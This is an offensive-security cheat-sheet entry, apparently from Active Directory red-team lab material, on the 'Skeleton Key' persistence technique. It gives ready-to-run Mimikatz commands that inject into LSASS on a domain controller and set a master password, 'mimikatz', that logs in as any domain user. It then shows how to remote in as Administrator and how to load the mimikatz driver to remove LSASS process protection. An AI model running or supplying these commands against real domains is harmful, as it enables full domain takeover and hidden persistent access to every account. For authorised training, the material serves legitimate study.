Persistence - Skeleton Key

This Skeleton Key injects itself into LSASS and creates a master password that will work for any account in the domain. After injecting, the attacker can use the Skeleton Key password configured at the time of deployment to log in as any domain user. Real users will still be able to log in using their original passwords. This authentication bypass applies to all services that use single-factor AD authentication, such as webmail and VPNs, and it also allows an attacker with physical access of the compromised system to gain control over the system by entering the injected password physically.

• DA privileges required

Skeleton Key

Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName dcorp-dc.dollarcorp.moneycorp.local

#Now, it is possible to access any machine with a valid username 
#and password as "mimikatz"
Enter-PSSession –Computername dcorp-dc –credential dcorp\Administrator

#You can access other machines as well as long as they authenticate with
#the DC which has been patched and the DC is not rebooted.



--------------------------
#In case lsass is running as a protected process, we can still use Skeleton
#Key but it needs the mimikatz driver (mimidriv.sys) on disk of the target DC:

mimikatz # privilege::debug
mimikatz # !+
mimikatz # !processprotect /process:lsass.exe /remove
mimikatz # misc::skeleton
mimikatz # !-

#Note that above would be very noisy in logs - Service installation (Kernel
mode driver)